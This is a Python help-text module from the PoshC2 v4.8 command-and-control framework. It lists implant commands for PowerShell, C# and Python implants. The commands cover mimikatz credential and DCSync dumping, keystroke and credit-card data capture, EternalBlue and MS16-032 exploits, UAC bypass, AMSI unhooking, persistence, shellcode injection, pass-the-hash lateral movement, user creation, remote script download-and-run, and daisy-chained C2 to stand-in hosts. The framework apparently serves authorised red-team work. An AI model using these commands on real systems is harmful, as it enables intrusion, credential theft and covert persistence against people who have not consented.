#!/usr/bin/python logopic = r""" __________ .__. _________ ________ \_______ \____ _____| |__ \_ ___ \ \_____ \\ | ___/ _ \/ ___/ | \ / \ \/ / ____/ | | ( <_>)___ \| Y \ \ \____/ \\ |____| \____/____ >___| / \______ /\_______ \\ \/ \/ \/ \/ =============== v4.8 www.PoshC2.co.uk ============= """ py_help1 = """ Implant Features: ===================== ps startanotherimplant or sai startanotherimplant-keepfile beacon 60s / beacon 10m / beacon 2h python print "This is a test" loadmodule loadmoduleforce get-keystrokes upload-file download-file install-persistence remove-persistence get-screenshot setbeacon kill-implant hide-implant unhide-implant help searchhelp persistence back label-implant linuxprivchecker """ sharp_help1 = """ Implant Features: ===================== ps beacon 60s / beacon 10m / beacon 2h turtle 60s / turtle 30m / turtle 8h ls c:\\temp\\ ls-recurse c:\\temp\\ get-content c:\\temp\\log.txt get-userinfo pwd delete c:\\temp\\test.exe move c:\\temp\\old.exe c:\\temp\\new.exe resolveip 127.0.0.1 resolvednsname google.com loadmodule Seatbelt.exe loadmoduleforce listmodule modulesloaded run-exe Core.Program Core run-dll Seatbelt.Program Seatbelt UserChecks start-process net -argumentlist users download-file "c:\\temp\\test.exe" upload-file -source /tmp/test.exe -destination "c:\\temp\\test.exe" kill-implant hide-implant unhide-implant help searchhelp listmodules label-implant back safetydump Migration =========== inject-shellcode c:\\windows\\system32\\svchost.exe inject-shellcode 1453 Privilege Escalation: ======================= arpscan 172.16.0.1/24 true get-serviceperms c:\\temp\\ get-screenshot get-screenshotmulti get-keystrokes c:\\temp\\logger.txt stop-keystrokes testadcredential domain username password testlocalcredential username password cred-popper loadmodule SharpUp.exe run-exe SharpUp.Program SharpUp Privilege Escalation: ======================= loadmodule Seatbelt.exe run-exe Seatbelt.Program Seatbelt all run-exe Seatbelt.Program Seatbelt BasicOSInfo run-exe Seatbelt.Program Seatbelt SysmonConfig run-exe Seatbelt.Program Seatbelt PowerShellSettings run-exe Seatbelt.Program Seatbelt RegistryAutoRuns Credentials / Tokens / Local Hashes (Must be SYSTEM): ========================================================= safetydump safetydump Network Tasks / Lateral Movement: ==================================== loadmodule Rubeus.exe run-exe Rubeus.Program Rubeus kerberoast run-exe Rubeus.Program Rubeus asreproast /user:username Network Tasks / Lateral Movement: ==================================== loadmodule SharpView.exe run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe* run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01 Bloodhound: ============= loadmodule SharpHound.exe run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\ """ posh_help1 = """ Implant Features: ===================== ps searchhelp mimikatz label-implant get-hash unhidefile hidefile get-ipconfig netstat beacon 60s / beacon 10m / beacon 2h turtle 60s / turtle 30m / turtle 8h kill-implant hide-implant unhide-implant get-proxy get-computerinfo unzip get-system get-system-withproxy get-system-withdaisy get-implantworkingdirectory get-pid posh-delete c:\\temp\\svc.exe get-webpage http://intranet listmodules modulesloaded loadmodule loadmodule inveigh.ps1 loadmoduleforce inveigh.ps1 get-userinfo invoke-hostenum -all find-allvulns invoke-expression (get-webclient).downloadstring("https://module.ps1") startanotherimplant or sai invoke-daisychain -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\\test -proxypassword pass -localhost (optional if low level user) createproxypayload -user -pass -proxyurl get-mshotfixes get-firewallrulesall | out-string -width 200 enablerdp disablerdp netsh.exe advfirewall firewall add rule name="enablerdp" dir=in action=allow protocol=tcp localport=any enable=yes get-wlanpass get-wmiobject -class win32_product get-creditcarddata -path 'c:\\backup\\' timestomp c:\\windows\\system32\\service.exe "01/03/2008 12:12 pm" icacls c:\\windows\\system32\\resetpassword.exe /grant administrator:f get-allfirewallrules c:\\temp\\rules.csv get-allservices get-wmireglastloggedon get-wmiregcachedrdpconnection get-wmiregmounteddrive resolve-ipaddress unhook-amsi get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`nAMSI Loaded`n"} } get-wmiObject -class win32_product """ posh_help2 = """ Privilege Escalation: ==================== invoke-allchecks Invoke-PsUACme -Payload "c:\\temp\\uac.exe" -method sysprep get-mshotfixes | where-object {$_.hotfixid -eq "kb2852386"} invoke-ms16-032 invoke-ms16-032-proxypayload invoke-eternalblue -target 127.0.0.1 -initialgrooms 5 -maxattempts 1 -msfbind get-gpppassword get-content 'c:\\programdata\\mcafee\\common framework\\sitelist.xml' dir -recurse | select-string -pattern 'password=' """ posh_help3 = """ File Management: ==================== download-file -source 'c:\\temp dir\\run.exe' download-files -directory 'c:\\temp dir\\' upload-file -source 'c:\\temp\\run.exe' -destination 'c:\\temp\\test.exe' web-upload-file -from 'http://www.example.com/app.exe' -to 'c:\\temp\\app.exe' Persistence: ================ install-persistence 1,2,3 remove-persistence 1,2,3 installexe-persistence removeexe-persistence install-servicelevel-persistence | remove-servicelevel-persistence install-servicelevel-persistencewithproxy | remove-servicelevel-persistence invoke-wmievent -name backup -command "powershell -enc abc" -hour 10 -minute 30 get-wmievent remove-wmievent -name backup Network Tasks / Lateral Movement: ================== get-externalip test-adcredential -domain test -user ben -password password1 invoke-smblogin -target 192.168.100.20 -domain testdomain -username test -hash/-password invoke-smbclient -Action Put -source c:\\temp\\test.doc -destination \\test.com\\c$\\temp\\test.doc -hash invoke-smbexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add" invoke-wmiexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add" net view | net users | net localgroup administrators | net accounts /dom whoami /groups | whoami /priv """ posh_help4 = """ Active Directory Enumeration: ================== invoke-aclscanner invoke-aclscanner | Where-Object {$_.IdentityReference -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name} get-objectacl -resolveguids -samaccountname john add-objectacl -targetsamaccountname arobbins -principalsamaccountname harmj0y -rights resetpassword get-netuser -admincount | select samaccountname get-domainuser -uacfilter not_password_expired,not_accountdisable -properties samaccountname,pwdlastset | export-csv act.csv get-netgroup -admincount | select samaccountname get-netgroupmember "domain admins" -recurse|select membername get-netcomputer | select-string -pattern "citrix" get-netcomputer -filter operatingsystem=*7*|select name get-netcomputer -filter operatingsystem=*2008*|select name get-domaincomputer -ldapfilter "(|(operatingsystem=*7*)(operatingsystem=*2008*))" -spn "wsman*" -properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl get-netgroup | select-string -pattern "internet" get-netuser -filter | select-object samaccountname,userprincipalname get-netuser -filter samaccountname=test get-netuser -filter userprinciplename=test@test.com get-netgroup | select samaccountname get-netgroup "*ben*" | select samaccountname get-netgroupmember "domain admins" -recurse|select membername get-netshare hostname invoke-sharefinder -verbose -checkshareaccess new-psdrive -name "p" -psprovider "filesystem" -root "\\\\bloredc1\\netlogon" Domain Trusts: ================== get-netdomain | get-netdomaincontroller | get-netforestdomain get-netforest | get-netforesttrust invoke-mapdomaintrust get-netuser -domain child.parent.com -filter samaccountname=test get-netgroup -domain child.parent.com | select samaccountname """ posh_help5 = """ Domain / Network Tasks: ================== invoke-bloodhound -collectionmethod 'stealth' -csvfolder c:\\temp\\ get-netdomaincontroller | select name | get-netsession | select *username,*cname get-dfsshare | get-netsession | select *username,*cname get-netfileserver | get-netsession | select *username,*cname invoke-kerberoast -outputformat hashcat|select-object -expandproperty hash write-scffile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\ write-inifile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\ get-netgroup | select-string -pattern "internet" invoke-hostscan -iprangecidr 172.16.0.0/24 (provides list of hosts with 445 open) get-netfileserver -domain testdomain.com find-interestingfile -path \\\\server\\share -officedocs -lastaccesstime (get-date).adddays(-7) brute-ad brute-locadmin -username administrator get-passpol get-passnotexp get-locadm invoke-inveigh -http y -proxy y -nbns y -tool 1 -StartupChecks y get-inveigh | stop-inveigh (gets output from inveigh thread) invoke-sniffer -outputfile c:\\temp\\output.txt -maxsize 50mb -localip 10.10.10.10 invoke-sqlquery -sqlserver 10.0.0.1 -user sa -pass sa -query 'select @@version' invoke-runas -user -password '' -domain -command c:\\windows\\system32\\cmd.exe -args " /c calc.exe" invoke-pipekat -target -domain -username -password '' -hash invoke-wmiexec -target -domain -username -password '' -hash -command """ posh_help6 = """ Lateral Movement: ========================================================= invoke-runaspayload -user -password '' -domain invoke-runasproxypayload -user -password '' -domain invoke-runasdaisypayload -user -password '' -domain invoke-dcompayload -target invoke-dcomproxypayload -target invoke-dcomdaisypayload -target invoke-psexecpayload -target -domain -user -pass '' -hash invoke-psexecproxypayload -target -domain -user -pass '' -hash invoke-psexecdaisypayload -target -domain -user -pass '' -hash invoke-wmipayload -target -domain -username -password '' -hash invoke-wmiproxypayload -target -domain -user -pass '' -hash invoke-wmidaisypayload -target -domain -user -pass '' invoke-winrmsession -ipaddress -user -pass """ posh_help7 = """ Credentials / Tokens / Local Hashes (Must be SYSTEM): ========================================================= invoke-mimikatz -command '"sekurlsa::logonpasswords"' invoke-mimikatz -command '"lsadump::sam"' invoke-mimikatz -command '"lsadump::lsa"' invoke-mimikatz -command '"lsadump::cache"' invoke-mimikatz -command '"lsadump::secrets"' invoke-mimikatz -command '"ts::multirdp"' invoke-mimikatz -command '"privilege::debug"' invoke-mimikatz -command '"crypto::capi"' invoke-mimikatz -command '"crypto::certificates /export"' invoke-mimikatz -command '"sekurlsa::pth /user: /domain: /ntlm: /run:c:\\temp\\run.bat"' invoke-tokenmanipulation | select-object domain, username, processid, iselevated, tokentype | ft -autosize | out-string invoke-tokenmanipulation -impersonateuser -username "domain\\user" get-lapspasswords Credentials / Domain Controller Hashes: ============================================ invoke-mimikatz -command '"lsadump::dcsync /domain:domain.local /user:administrator"' invoke-dcsync -pwdumpformat dump-ntds -emptyfolder """ posh_help8 = """ Useful Modules: ==================== get-screenshot get-screenshotallwindows get-screenshotmulti -timedelay 120 -quantity 30 get-recentfiles cred-popper get-clipboard hashdump get-keystrokes | get-keystrokedata arpscan -ipcidr 10.0.0.1/24 portscan -ipaddress 10.0.0.1-50 -ports "1-65535" -maxqueriesps 10000 -delay 0 ((new-object Net.Sockets.TcpClient).connect("10.0.0.1",445)) get-netstat | %{"$($_.Protocol) $($_.LocalAddress):$($_.LocalPort) $($_.RemoteAddress):$($_.RemotePort) $($_.State) $($_.ProcessName)($($_.PID))"} 1..254 | %{ try {[System.Net.Dns]::GetHostEntry("10.0.0.$_") } catch {} }|select hostname migrate migrate -procid 4444 migrate -procpath c:\\windows\\system32\\searchprotocolhost.exe -suspended -RtlCreateUserThread migrate -procpath c:\\windows\\system32\\svchost.exe -suspended inject-shellcode -x86 -shellcode (gc c:\\temp\\shellcode.bin -encoding byte) -procid 5634 get-eventlog -newest 10000 -instanceid 4624 -logname security | select message -expandproperty message | select-string -pattern "user1|user2|user3" send-mailmessage -to "itdept@test.com" -from "user01 " -subject <> -smtpserver <> -attachment <> sharpsocks -uri http://www.c2.com:9090 -beacon 2000 -insecure netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow program="C:\\windows\\system32\\svchost.exe" protocol=TCP localport=80 profile=Domain $socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);$socket.start(); reversedns 10.0.0.1 [System.Net.Dns]::GetHostbyAddress("10.0.0.1") Implant Handler: ===================== searchhelp back quit exit """ pre_help = """ Main Menu: ================================ use implant by , e.g. 1 use multiple implants by ,,, e.g. 1,2,5 use implant by range, e.g. 40-45 use all implants by all Auto-Runs: ===================== add-autorun list-autorun (alias: l) del-autorun nuke-autorun automigrate-frompowershell (alias: am) Server Commands: ===================== tasks opsec show-urls list-urls cleartasks show-serverinfo history output-to-html set-clockworksmsapikey df2 set-clockworksmsnumber 44789 set-defaultbeacon 60 turnon-notifications turnoff-notifications listmodules pwnself (alias: p) creds -action -username -password/-hash createnewpayload createproxypayload createdaisypayload quit """ posh_help = posh_help1 + posh_help2 + posh_help3 + posh_help4 + posh_help5 + posh_help6 + posh_help7 + posh_help8 # pre help commands PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell', 'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon', 'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules', 'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"] # post help commands powershell implant COMMANDS = ['loadmodule',"bloodhound","brute-ad","brute-locadmin", "bypass-uac","cve-2016-9192","convertto-shellcode","decrypt-rdcman","dump-ntds","get-computerinfo","get-creditcarddata","get-gppautologon", "get-gpppassword","get-idletime","get-keystrokes","get-locadm","get-mshotfixes","get-netstat","get-passnotexp","get-passpol","get-recentfiles", "get-serviceperms","get-userinfo","get-wlanpass","invoke-hostenum","inject-shellcode","inveigh-relay","inveigh","invoke-arpscan","arpscan", "invoke-dcsync","invoke-eventvwrbypass","invoke-hostscan","invoke-ms16-032-proxy","invoke-ms16-032","invoke-mimikatz","invoke-psinject", "invoke-pipekat","invoke-portscan","invoke-powerdump","invoke-psexec","invoke-reflectivepeinjection","invoke-reversednslookup", "invoke-runas","invoke-smbexec","invoke-shellcode","invoke-sniffer","invoke-sqlquery","invoke-tater","invoke-thehash", "invoke-tokenmanipulation","invoke-wmichecker","invoke-wmicommand","invoke-wmiexec","invoke-wscriptbypassuac","invoke-winrmsession", "out-minidump","portscan","invoke-allchecks","set-lhstokenprivilege","sharpsocks","find-allvulns","test-adcredential","new-zipfile", "get-netuser","sleep","beacon","setbeacon","get-screenshot", "install-persistence","hide-implant","unhide-implant","kill-implant","invoke-runasdaisypayload", "invoke-runasproxypayload", "invoke-runaspayload","migrate","$psversiontable","back", "clear","invoke-daisychain","stop-daisy", "ipconfig","upload-file","download-file","download-files","history","get-help","stopsocks","get-screenshotallwindows", "hashdump","cred-popper","help","whoami","createnewpayload","createproxypayload","createdaisypayload","get-proxy","restart-computer", "turtle","posh-delete","get-idletime","get-psdrive","get-netcomputer","get-netdomain","get-netforest","get-netforesttrust", "get-forestdomain","test-connection","get-netdomaincontroller","invoke-pbind","pbind-command","invoke-kerberoast","invoke-userhunter", "get-process","start-process","searchhelp","get-netshare","pbind-kill","install-servicelevel-persistencewithproxy", "install-servicelevel-persistence","remove-servicelevel-persistence","reversedns","invoke-eternalblue","loadmoduleforce","unhook-amsi", "get-implantworkingdirectory","get-system","get-system-withproxy","get-system-withdaisy","get-pid","listmodules","modulesloaded", "startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence","get-hash","get-creds","resolve-ipaddress", "invoke-wmievent","remove-wmievent","get-wmievent","invoke-smbclient","get-keystrokedata","unhidefile","hidefile", "label-implant", 'invoke-psexecpayload','invoke-wmipayload','invoke-dcompayload','invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomproxypayload','invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload'] # post help commands python implant UXCOMMANDS = ["label-implant", "unhide-implant","hide-implant","help","searchhelp","python","loadmodule", "loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai", "startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant","linuxprivchecker"] # post help commands sharp implant SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","move","label-implant","upload-file", "download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential", "testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir", "inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule", "loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump"]